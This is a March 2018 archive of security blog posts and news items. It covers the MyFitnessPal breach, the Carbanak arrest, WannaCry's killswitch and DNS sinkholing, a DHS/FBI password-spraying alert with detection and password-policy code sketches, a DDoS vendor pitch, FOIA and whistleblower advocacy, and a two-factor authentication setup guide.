Monthly Archives: March 2018

New Traffic Light Protocol (TLP) levels for 2018

The Traffic Light Protocol should be familiar to anyone working with sensitive data, with levels RED, AMBER, GREEN and WHITE being used to specify how far information can be shared. In recent years it has become clear that these four levels are not enough, so the United Nations International Committee on Responsible Naming (UN/ICoRN) has introduced nine new TLP levels for implementation from the …

Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested

Under Armour announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.

The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”

MyFitnessPal also said that it will require users to change their passwords and is urging them to do so immediately. The company is also urging users to review their accounts for suspicious activity and to change the password on any other online account that used the same or a similar password as their now-breached MyFitnessPal credentials.

It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.


Other trending cybercrime events from the week include:

  • Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Stormont in Northern Ireland is warning all staff of a cyber-attack that targeted email accounts with numerous password attempts and compromised a number of accounts. Shutterfly is notifying customers that their personal information may have been compromised after an employee’s credentials were used without authorization to access its Workday test environment.
  • Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
  • Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
  • Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbanak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.

Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.

The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year it had created a more sophisticated version of the malware known as Carbanak, which the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.

“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”

Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”

The accused FBI whistleblower indicted by Trump’s DOJ allegedly leaked secret rules for spying on reporters

DIOG cover

The Trump Justice Department escalated its crackdown on journalists’ sources and whistleblowers this week, charging former FBI special agent Terry Albury with two counts under the Espionage Act for allegedly leaking information to an unnamed news outlet, widely believed to be The Intercept.

The case is yet another example of the outrageous—and recently, far too common—use of the World War I-era law to persecute the sources of journalists for the crime of informing the American public. The fact that whistleblowers have been thrown in jail with increasing regularity under a law meant for spies should be an outright scandal. As First Look Media, The Intercept’s parent company, said through its Press Freedom Fund, “The misuse of the Espionage Act chills truth tellers, impedes investigative reporting, and compromises the democratic process.”

But it’s also important to understand what Mr. Albury is alleged to have leaked and how it makes him a true whistleblower. News reports indicate he is accused of providing The Intercept documents related to its “FBI’s Secret Rules” reporting project, an important series of articles that looks into how the FBI secretly conducts investigations.

Notably, the very first story The Intercept published in that series was about a document containing the FBI’s classified rules for specifically targeting journalists with National Security Letters (NSLs), the controversial and due process-free surveillance tool that the agency can serve on telecom companies like AT&T and Verizon to spy on journalists and root out their sources.

Surveillance of journalists is supposed to be governed by the Justice Department’s strict “media guidelines,” which the Obama administration updated and strengthened after several embarrassing scandals in which the Obama-era Justice Department was caught surveilling journalists. But critically, NSLs are completely exempt from those rules.

Instead, the rules for using NSLs against journalists are in the classified appendix of the FBI’s “Domestic Investigations and Operations Guide” (DIOG), under the heading “National Security Letters for Telephone Toll Records of Members of the News Media or Media Organizations.” The secret rules allow the Justice Department to use NSLs with virtually none of the restrictions or safeguards that would be in place if it attempted to get a subpoena or court order for a journalist’s private telephone toll records. You can see the leaked version of the rules here:

Along with the Knight First Amendment Institute at Columbia, we are currently suing the Justice Department under the Freedom of Information Act for the current versions of these documents.

But as you can see from the leaked 2013 version, it’s absurd these rules were ever classified in the first place. There’s nothing “damaging” to national security for the public to know the FBI’s “approval requirements” consist of merely getting an additional sign off from a superior to target a journalist with an NSL. It’s clear from looking at the document that the classification system is being abused to cover up embarrassing and controversial practices which have no business being stamped secret.

Instead, it’s likely that the government wants these rules kept secret so that the FBI can continue to circumvent the DOJ media guidelines and spy on journalists in secret, without facing any public scrutiny of the practice.

The prosecution of Mr. Albury is outrageous, but if he was The Intercept’s source, then he exposed the government’s secret powers to spy on news organizations with no oversight. For that, he should be viewed by journalists as a hero.

Disclosure: First Look Media, The Intercept’s parent company, provides Freedom of the Press Foundation with an annual grant and three employees of First Look, Glenn Greenwald, Laura Poitras, and Micah Lee, sit on FPF’s board. They were not consulted in the drafting of this blog post.

State of Software Security: Checking the Pulse of the Healthcare Industry

Over the past year, our scans of thousands of applications and billions of lines of code found widespread weaknesses in applications, a top target of cyber attackers. And when you zoom in from the big-picture view down to a micro level, a few industries are struggling to keep up with the rapidly changing cybersecurity landscape and to combat the tactics of today's malicious actors.

One of these sectors is healthcare. Healthcare organizations hold some of the most sensitive personal data, yet they have been victims of several high-profile breaches in recent years. In 2017 alone, healthcare data breaches increased, with one breach impacting more than one million individuals, and 14 breaches of more than 100,000 records. According to the CA Veracode 2017 State of Software Security report (SOSS), which includes scan data collected from our own platform over the past year, healthcare organizations made security strides, increasing OWASP policy compliance by an average of nine percent between an application’s first and last scan. But healthcare applications had a high prevalence of flaws in the information leakage (55 percent) and cryptographic issues (52 percent) categories.

The Raw State of Untested Software

In theory, the growing awareness of security within the developer community should be prodding the overall body of coders to improve their daily programming best practices. Unfortunately, the stats don’t reflect this. We saw OWASP pass rates, for example, drop by about eight percentage points from last year. However, this may be related to the new companies added to the scan, including healthcare, hospitality and retail apps being scanned for the first time this year.

On the bright side, OWASP pass rates have improved by a statistically significant margin compared to our initial data in 2010. And when organizations first scan their applications for vulnerabilities, they’re bound to find flaws. Still, we had hoped that our research into vulnerability prevalence would show at least some improvement in the raw state of software before security testing. If you’re looking for a silver lining, note that the lowest-performing industries in last year’s SOSS study (healthcare and government) experienced the smallest declines in pass rate year-over-year. That silver lining becomes a mere sliver when you look at the percentage of applications affected by the top three vulnerability categories in the healthcare industry: information leakage (55.2 percent), cryptographic issues (51.5 percent) and code quality (35.1 percent).

And this year, we also took a peek at how many applications within an industry were undergoing their first policy scan as compared to the rest of the portfolio under current testing. A higher percentage of new applications undergoing their first policy scan, as in healthcare, tends to suggest that those organizations are just getting started with their application security maturity process.

Meanwhile, healthcare was among the industries that onboarded the most applications relative to the size of their portfolios. This could go a long way toward explaining their good performance in remediation from first scan to latest scan. With so many new applications added, these industries likely were able to take care of a lot of low-hanging fruit, namely easy-to-fix flaws that were newly found.

How to Scale Up Security Success

The good news is that it’s not all doom and gloom. For instance, the latest SOSS report highlights that manufacturing and aerospace organizations have already made security part of their software development process. As a result, they have the highest OWASP pass rate on latest scan (30.5 percent) of any industry grouping, and the lowest proportion of applications undergoing their first assessment (nearly 40 percent). It goes to show that if you stick with a solid security program, improve security through testing, and give your developers the resources they need for testing and remediation, then any industry can improve its application security posture — including healthcare.

Our research shows that organizations that do testing and remediation are prioritizing the worst vulnerabilities, reducing flaw density on very high and high severity flaws at twice the clip of the overall field of vulnerabilities. Nevertheless, only 14 percent of the most severe flaws are fixed in under a month, and nearly 12 percent of applications have at least one high or very high severity flaw.

The latest SOSS report gives us reason to think long and hard about where we need to go in order to achieve AppSec maturity. And while it seems like we are moving the application security needle slowly, there is a bright light at the end of the tunnel. With the right program in place, all industries can improve the state of software security. Looking to improve AppSec in your organization? Test early and often, give developers the resources they need, and fix what you can, starting with the bugs that matter most.


WannaCry after one year

In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.

It's possible that what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this from watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, has whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.

Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).

Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation of WannaCry's first appearance. WannaCry is a worm, which means it has spread automatically since it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug an unpatched computer into the raw Internet, without the benefit of a firewall, it'll get infected within an hour.

However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories implies some nefarious hacker activity that "targeted" Boeing, but that's unlikely.

We now have over 15 years of experience with network worms getting into strange places disconnected, and even "air gapped", from the Internet. The most common vector is laptops. Somebody takes their laptop to some place like an airport WiFi network and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At that point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, giving them a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.

Another cause of infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed-up running image. If that backup image is infected, restoring it brings a live copy of the worm back onto the network, where it can start spreading again.

Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup: the worm stops itself if it can resolve a certain domain. Manufacturing networks are often disconnected enough from the Internet that such DNS lookups fail, so the domain can't be found and the killswitch never fires. Thus, manufacturing systems are no more likely to get infected, but the lack of a working killswitch means the virus continues to run, attacking more systems instead of immediately killing itself.
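The killswitch mechanics described above amount to a single DNS check. A minimal sketch in Python, using a placeholder domain (the real killswitch domain is deliberately not reproduced here):

```python
import socket

# Placeholder only -- NOT the actual WannaCry killswitch domain.
KILLSWITCH_DOMAIN = "example-killswitch-domain.test"

def killswitch_triggered(domain: str = KILLSWITCH_DOMAIN) -> bool:
    """Return True if the domain resolves, i.e. the worm should stop."""
    try:
        socket.gethostbyname(domain)
        return True   # domain resolved: killswitch fires, worm exits
    except socket.gaierror:
        return False  # no resolution (e.g., isolated network): worm keeps running
```

On an Internet-connected network the lookup succeeds and the worm exits; on an isolated manufacturing network the lookup fails, which is exactly why the killswitch never fires there.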

One solution to this would be to set up sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs all requests. This is trivially set up with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. A side effect is that it would let the killswitch resolve, and thus kill WannaCry. WannaCry isn't sufficient reason on its own to set up sinkhole servers, of course, but it's something I've found generally useful in the past.
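As a sketch of how simple this is, dnsmasq can sinkhole everything with a single wildcard rule; the addresses and log path below are illustrative assumptions, not a recommended production layout:

```
# /etc/dnsmasq.conf (sketch)
# Resolve every queried name to the sinkhole host, so all stray
# lookups -- including a worm's killswitch check -- land in one place.
address=/#/10.0.0.53

# Log every query for later review.
log-queries
log-facility=/var/log/dnsmasq-sinkhole.log
```

In a real deployment you would forward or whitelist the domains the network legitimately needs, and point internal DHCP at this resolver.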


Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry.

The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect.

Introducing @FOIAFeed, a Twitter bot that finds and shares Freedom of Information Act journalism


Freedom of the Press Foundation is launching @FOIAFeed today, a new project that aims to automatically find and surface reporting that uses the Freedom of Information Act or other public records laws to obtain source material.

@FOIAFeed is a Twitter bot that reads stories as they are published from over a dozen major news organizations, and posts links and excerpts to Twitter whenever it finds a relevant article. In our experience so far, the bot turns up new and important stories nearly every day. You can follow @FOIAFeed here.

There’s no doubt that the FOIA process is cumbersome, and in some ways, badly broken. But investigative journalism that digs into primary source documents obtained through public records laws is interesting and substantial work, and we like to shine a spotlight on that reporting.

@FOIAFeed's results show that public records laws enable that kind of investigation across a broad cross-section of subjects. In just the last few days, it has posted stories about the political rise of certain career officials in the Trump administration, links between campaign contributions and sting operations against men who patronize sex workers, and apparent age discrimination among employees at tech giant IBM.

Public records as a through-line between this diverse array of stories may not be obvious, but we hope that people interested in the mechanics of journalism will get some value out of seeing these stories compiled together.

Beyond that, we have two major goals for the @FOIAFeed project. One is to inspire journalists to see what their peers are doing with public records laws, and to hopefully find ways to push the envelope even further. We've heard from journalists that the world of FOIA requests can seem insular and intimidating, not least because of inadequacies in the law. Some requests get ignored, while others take years and come back almost completely censored, like a recent Miami Herald story that was just picked up by @FOIAFeed.

Despite its flaws, FOIA can produce powerful results. We hope that a steady stream of examples can help reduce the threshold for journalists to dive in (or even for FOIA pros to pick up new ideas).

A second goal is to underscore the importance of public records laws in investigative reporting. Highlighting the tools that journalists use to report their stories can help advocates for those tools, both when there is opportunity to expand and improve them (as with the FOIA Improvement Act of 2016, for example) or when there is a need to defend them (as with the recent "cyber-security" exemption added to Michigan's public records law, or the successful push to prevent a gutting of the Washington Public Records Act).

Currently, @FOIAFeed is monitoring news stories from the Associated Press, Reuters, the Los Angeles Times, the New York Times, Buzzfeed News, the Washington Post, the Chicago Tribune, the Miami Herald, CNN, Gizmodo, ProPublica, The Intercept, and the Marshall Project. It relies on RSS feeds from those organizations, and we plan to expand in the coming days to cover more outlets that engage in public records reporting and offer such feeds.
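A minimal sketch of the matching step might look like the following; the keyword list, and the assumption that matching runs over RSS item titles and descriptions, are ours for illustration, not details of the actual @FOIAFeed implementation:

```python
import xml.etree.ElementTree as ET

# Hypothetical keyword list -- the real bot's matching rules may differ.
KEYWORDS = ("freedom of information act", "foia",
            "public records request", "records obtained by")

def match_foia_items(rss_xml: str):
    """Return (title, link) pairs for RSS items whose title or
    description mentions a public-records keyword."""
    root = ET.fromstring(rss_xml)
    hits = []
    for item in root.iter("item"):
        title = item.findtext("title") or ""
        desc = item.findtext("description") or ""
        text = f"{title} {desc}".lower()
        if any(keyword in text for keyword in KEYWORDS):
            hits.append((title, item.findtext("link")))
    return hits
```

The real bot would poll each outlet's feed on a schedule and post matching links to Twitter; the sketch above covers only the filtering step.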

Additionally, we will soon be releasing the underlying source code that powers @FOIAFeed, and we hope it will be useful to other potential bot developers. Our bot focuses on public records laws, but as we develop and generalize it, we think it could be used as a broader public news alert system on any topic you’d like.

Why I’m Going to RSA 2018: CA Veracode’s New SVP of Engineering


Paiman Nodoushan has been working at CA Veracode for about two months. In that time, he's met a lot of his peers and claims he already remembers over 50% of their names, no small feat. Jokes aside, he's been getting to know his team, our projects, and the ins and outs of our entire SaaS operation. In our quick interview, he describes the team at Veracode as hard working and passionate, and goes on to point out that:

"One thing that I don't think people actually realize is how difficult it is to build a whole SaaS operation. From pre-sales through sales, to engineering, product management, and to post-sales, connecting to all the backend systems that exist - it takes years for companies to go and build that."

We're lucky our Founders had the foresight to keep us focused on a SaaS model in our earliest days, and that we have a leader like Paiman joining us to help drive further improvements in those operations. Paiman is headed to the RSA Conference with many others from the CA Technologies and Veracode teams; this will be his first RSA Conference ever.

Why Attend RSA?

Paiman lists three things he's looking to accomplish at the RSA Conference this year:

  1. Meeting Customers
  2. Hearing from Competition
  3. Learning

Be sure to catch Paiman at the CA Veracode booth this year and watch the full interview below to get to know him some more.

Banks in Denial over Their Resilience to DDoS attacks

Are retail and investment banks in denial about being adequately protected from the frequent, advanced DDoS attacks they’re getting hit with today? It is mid-March 2018 – just three months into the year – and three major banks have already been taken offline by DDoS attacks, making global headlines. Reuters reported that ABN Amro, ING and Rabobank were targeted by hackers, temporarily disrupting online and mobile banking services at the end of January (Reuters, Jan 29, 2018: “Dutch tax office, banks hit by DDoS cyber attacks”). Whatever DDoS attack protection they had in place proved to be insufficient.

So why are today’s DDoS attacks so successful against well-heeled financial institutions that spend more on cyber-security than most organizations spend on IT in total? The problem may lie in the “protection gap” within banks’ legacy DDoS attack protection solutions, which have evolved over the last 20 years but focus principally on defending against large volumetric DDoS attacks. Banks typically rely on two DDoS architectural components:

  • Cloud DDoS mitigation for elastic scalability during large volumetric attacks
  • Web Application Firewalls (WAFs) to handle encrypted traffic and to provide confidentiality and integrity for encrypted “Layer 7” banking applications

Legacy DDoS attack defenses often lack the automation required to provide real-time mitigation of today’s short-duration DDoS attacks. Corero’s analysis shows that even the largest banks frequently have this protection gap and it is the Achilles’ heel within their DDoS defenses.

From the Verizon DBIR graph below we see that Financial Services organizations are twice as likely to be hit with a DDoS attack as any other industry. Despite this fact, the protection gap paradox suggests that banks remain either in ignorance or denial and, consequently, haven’t adjusted their DDoS defenses to be resilient to the short, sharp DDoS attacks that dominate today. Corero’s primary research shows that, in 2017, 96% of DDoS attacks were less than 5 Gbps and 71% lasted 10 minutes or less.


2017 Verizon Data Breach Investigations Report (DBIR)

Protecting all IP addresses presents economic and compliance challenges for banks using this legacy DDoS attack prevention architecture:

  • Always-on cloud DDoS mitigation across all IP address ranges is eye-wateringly expensive, so even wealthy banks tend not to cover all IP addresses - leaving some of their IP addresses unprotected against DDoS attacks.
  • To cover encrypted traffic, they are required to surrender crypto-keys, which risks non-compliance with personal data protection regulations.

These challenges effectively create a “Catch 22” scenario where these banks can’t be fully protected even by always-on cloud DDoS defenses.

Consumers now demand and regulations require that banks (and other enterprises) keep their services available with zero downtime and that personal data privacy is guaranteed. As the Dutch experience has demonstrated, modern DDoS cyber-attacks pose a serious threat to both service availability and data security. Consequently, banks are at risk from trading outages, punitive regulatory fines, and customer churn.

There is good news for banks. Corero’s SmartWall® Threat Defense System can supplement their existing defenses to deliver fully automated, real-time protection against today’s DDoS attacks. SmartWall mitigates both the short, sharp attacks and larger attacks, including amplification attacks that exploit the recently publicized “Memcached” vulnerability.

TA18-086A: Brute Force Attacks Conducted by Cyber Actors

Original release date: March 27, 2018 | Last revised: March 28, 2018

Systems Affected

Networked systems


According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.

In February 2018, the Department of Justice in the Southern District of New York indicted nine Iranian nationals associated with the Mabna Institute for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.


In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in the targeted account getting locked out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.
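The difference between the two techniques is essentially loop order. A hypothetical sketch (the account and password values are illustrative):

```python
def brute_force_order(accounts, passwords):
    """Traditional brute force: hammer one account with many passwords.
    This trips a 3-5-attempt lockout policy almost immediately."""
    return [(a, p) for a in accounts for p in passwords]

def password_spray_order(accounts, passwords):
    """Password spray ('low and slow'): try one password across all
    accounts before moving to the next password, so no single account
    sees rapid repeated failures."""
    return [(a, p) for p in passwords for a in accounts]
```

With accounts `["alice", "bob"]` and passwords `["Winter2018", "Password123!"]`, brute force tries both passwords against `alice` before touching `bob`, while the spray tries `Winter2018` against every account first.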

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. 

Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implement inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Using social engineering tactics to perform online research (e.g., Google searches, LinkedIn) to identify target organizations and specific user accounts for the initial password spray
  • Using easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accounts
  • Using the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO portal or web-based application;
    • Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).
    • Attacks have been seen to run for over two hours.
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations.
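As a rough sketch of how the first indicator might be hunted in authentication logs, the following Python fragment flags source IPs whose failed logons touch many distinct accounts. The log records and threshold are hypothetical; real detection would also key on user-agent strings and time windows:

```python
from datetime import datetime

# Hypothetical parsed auth-log records: (timestamp, source_ip, account, success)
events = [
    (datetime(2018, 3, 27, 9, 0, 1), "203.0.113.7",  "alice", False),
    (datetime(2018, 3, 27, 9, 0, 2), "203.0.113.7",  "bob",   False),
    (datetime(2018, 3, 27, 9, 0, 3), "203.0.113.7",  "carol", False),
    (datetime(2018, 3, 27, 9, 5, 0), "198.51.100.4", "dave",  True),
]

def spray_suspects(events, min_distinct_accounts=3):
    """Flag source IPs whose failed logons span many DISTINCT accounts
    (the signature of a spray) rather than hammering one account."""
    accounts_per_ip = {}
    for ts, ip, account, success in events:
        if not success:
            accounts_per_ip.setdefault(ip, set()).add(account)
    return sorted(ip for ip, accts in accounts_per_ip.items()
                  if len(accts) >= min_distinct_accounts)

print(spray_suspects(events))  # → ['203.0.113.7']
```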

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1][2]:

  • Use SSO or web-based applications with federated authentication method
  • Lack multifactor authentication (MFA)
  • Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)
  • Use inbox synchronization, allowing email to be pulled from cloud environments to remote devices
  • Allow email forwarding to be set up at the user level
  • Have limited logging in place, creating difficulty during post-event investigations


A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information;
  • Disruption to regular operations;
  • Financial losses incurred to restore systems and files; and
  • Potential harm to an organization’s reputation.


Recommended Mitigations

To help deter this style of attack, the following steps should be taken:

  • Enable MFA and review MFA settings to ensure coverage over all active, internet-facing protocols.
  • Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.
  • Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.
  • Many companies offer additional assistance and tools that can help detect and prevent password spray attacks, such as those described in the Microsoft blog post released on March 5, 2018. [4]
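To illustrate the password-policy point, a NIST-style check compares candidate passwords against a blocklist of known weak or breached values rather than relying on composition rules alone. The blocklist below is a tiny made-up sample; real deployments load large breach corpora:

```python
# Tiny illustrative blocklist; production systems load millions of
# known-breached passwords instead.
COMMON_PASSWORDS = {"winter2018", "password123!", "qwerty", "letmein"}

def is_acceptable(password: str, min_length: int = 8) -> bool:
    """Reject passwords that are too short or appear on the blocklist
    (compared case-insensitively), following NIST SP 800-63B guidance."""
    if len(password) < min_length:
        return False
    return password.lower() not in COMMON_PASSWORDS

print(is_acceptable("Winter2018"))                    # → False (blocklisted)
print(is_acceptable("correct horse battery staple"))  # → True
```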

Reporting Notice

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI's 24/7 Cyber Watch (CyWatch). Field office contacts can be identified online; CyWatch can be contacted by phone at (855) 292-3937 or by e-mail. When available, each report submitted should include the date, time, location, type of activity, number of people, type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI's National Press Office at (202) 324-3691.


Revision History

  • March 27, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Protecting Yourself from a Data Breach Requires Two Step Authentication

Have you ever thought about how a data breach could affect you personally? What about your business? Either way, it can be devastating. Fortunately, there are ways that you can protect your personal or business data, and it’s easier than you think. Don’t assume that protecting yourself is impossible just because big corporations get hit with data breaches all of the time. There are things you can do to get protected.

  • All of your important accounts should use two-factor authentication. This limits the damage of an exposed password: if a password is all a criminal needs to access your account, then once they have it, they are already in.
  • When using two-factor authentication, you must first enter your password. However, you also have to complete a second step: the website sends a unique code, also known as a “one-time password,” to the account owner's phone. The only way to access the account, even with the password, is to enter that code. The code changes each time. So, unless a hacker has your password AND your mobile phone, they can't get into your account.
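Under the hood, many of these rotating codes are TOTP values (RFC 6238): the website and your phone share a secret, and each derives a short code from the current 30-second time step. A minimal Python sketch, assuming the standard TOTP scheme; this is illustrative, not how any particular site's implementation necessarily works:

```python
import hmac, hashlib, struct, time

def totp(secret: bytes, at: float = None, step: int = 30, digits: int = 6) -> str:
    """Derive a one-time code as in RFC 6238 (TOTP): HMAC-SHA1 over the
    current 30-second time step, dynamically truncated to a short decimal
    code. This is why the code changes each time and expires quickly."""
    counter = int((time.time() if at is None else at) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % (10 ** digits)).zfill(digits)

# The website and your phone share `secret`, so both derive the same code
# for the current time step; a stolen password alone is not enough.
print(totp(b"12345678901234567890", at=59))  # → 287082 (RFC 6238 test time)
```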

All of the major websites that we most commonly use have some type of two-factor authentication. They are spelled out, below:


The two-factor authentication that Facebook offers is called “Login Approvals.” You can find it in the blue menu bar at the top right side of your screen. Click the arrow that you see, which opens a menu. Choose the Settings option, and look for a gold-colored badge. You then see “Security,” which you should click. To the right of that, you should see Login Approvals and, near that, a box that says “Require a security code.” Put a check mark there and then follow the instructions. The Facebook Code Generator might require you to use the mobile application on your phone to get your code. Alternatively, Facebook sends a text.


Google also has two-factor authentication, which it calls 2-Step Verification. To set it up, go to the 2-Step Verification page and look for the blue “Get Started” button on the upper right of the screen. Click it, and then follow the directions. You can also opt for a text or a phone call to get a code. This also sets you up for other Google services, including YouTube.


Twitter also has a form of two-factor authentication. It is called “Login Verification.” To use it, log in to Twitter and click on the gear icon at the top right of the screen. You should see “Security and Privacy.” Click that, and then look for “Login Verification” under the Security heading. You can then choose how to get your code and then follow the prompts.


PayPal has a feature known as “Security Key.” To use this, look for the Security and Protection section on the upper right corner of the screen. You should see PayPal Security Key on the bottom left. Click the option to “Go to register your mobile phone.” On the following page, you can add your phone number. Then, you get a text from PayPal with your code.


Yahoo uses “Two-step Verification.” To use it, hover over your Yahoo avatar, which brings up a menu. Click on Account Settings and then on Account Info. Then, scroll until you see Sign-In and Security. There, you will see a link labeled “Set up your second sign-in verification.” Click that and enter your phone number. You should get a code via text.


The system that Microsoft has is called “Two-step Verification.” To use it, go to the Microsoft account website and look for the link on the left that goes to Security Info. Click that link. On the right side, click Set Up Two-Step Verification, and then follow the prompts.


Apple also has something called “Two-Step Verification.” To use it, go to the Apple ID website. On the right is a blue box labeled Manage Your Apple ID. Hit that, and then use your Apple ID to log in. You should then see a link for Passwords and Security. You have to answer two questions to access the Security Settings area of the site. There, you should see another link labeled “Get Started.” Click that, and then enter your phone number. Wait for your code on your mobile phone, and then enter it.


